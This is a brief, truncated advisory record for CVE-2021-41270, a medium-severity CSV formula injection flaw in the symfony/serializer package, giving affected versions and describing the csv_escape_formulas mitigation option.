CVE-2021-41270MEDIUM≥ 5.0.0, < 5.3.12·≥ 4.1.0, < 4.4.352021-11-24
CVE-2021-41270 [MEDIUM] CWE-1236 CSV Injection in symfony/serializer
CSV Injection in symfony/serializer
Description
CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. When a spreadsheet program opens a CSV, any cell starting with `=` is interpreted by the software as a formula and could be abused by an attacker.
In Symfony 4.1, we've added the opt-in `csv_escape_formulas` option in `CsvEncoder`, to prefix all cells starting by `=`, `+
ghsaosv